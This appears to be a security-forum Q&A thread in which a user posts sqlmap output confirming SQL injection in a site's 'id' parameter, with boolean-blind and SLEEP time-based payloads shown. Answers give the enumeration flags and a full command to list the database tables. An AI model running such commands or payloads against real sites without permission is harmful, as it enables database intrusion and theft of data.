I've just started using sqlmap to test for possible SQL injection attacks.

I have got a website which is vulnerable:

C:\Python27>python xxx\sqlmap\sqlmap.py -u http://www.example.com/page.php?id=1

[*] starting at: 19:33:27

[19:33:27] [INFO] using 'xxx\session' as session file
[19:33:27] [INFO] testing connection to the target url
[19:33:31] [INFO] testing if the url is stable, wait a few seconds
[19:33:33] [INFO] url is stable
[19:33:33] [INFO] testing if GET parameter 'id' is dynamic
[19:33:33] [INFO] confirming that GET parameter 'id' is dynamic
[19:33:34] [INFO] GET parameter 'id' is dynamic
[19:33:35] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[19:33:35] [INFO] testing sql injection on GET parameter 'id'
[19:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:33:39] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[19:33:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[19:33:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:33:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:34:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[19:34:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3404=3404

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[19:34:55] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.15
back-end DBMS: MySQL 5.0.11
[19:34:55] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 21 times
[19:34:55] [INFO] Fetched data logged to text files under 'xxx\output\www.example.com'

[*] shutting down at: 19:34:55

Now I would like to find out whether it is possible to see, for example, all the tables in the database.

What do I have to type in the command line to check this?

kalina
PeeHaa
  • Just use Havij or Pangolin. You should try to read a manual, or to type --help for help with a command. This is why I'm also downvoting you. – atdre Jun 13 '11 at 19:43
  • Why the profanity? I just didn't realize that the options are called enumeration. ... – PeeHaa Jun 13 '11 at 19:48
  • Whilst you are correct that this was pretty much an RTFM-type question, please stick to the [FAQ] - be nice. Also, such a comment (but nicer) would be more appropriate as a comment, not an answer. Besides, sometimes it is hard to find something when you don't know what you're looking for.... – AviD Jun 14 '11 at 00:35

2 Answers

What you are asking to find out is called enumeration.

Reading the SQLMap manual under the enumeration topic provides me with the following information:

  • --dbs for databases
  • --tables for tables
  • --columns for columns

There is also a lot of other good information in the manual, so I suggest reading over it if you have more questions about flags and parameters the tool takes.

I've added a blog post about enumeration with SQLMap here: http://www.securesolutions.no/enumeration-with-sqlmap/

Chris Dale

Oh, you're so close, it's

./sqlmap.py -u "http://www.example.com/page.php?id=1" --tables

apricot boy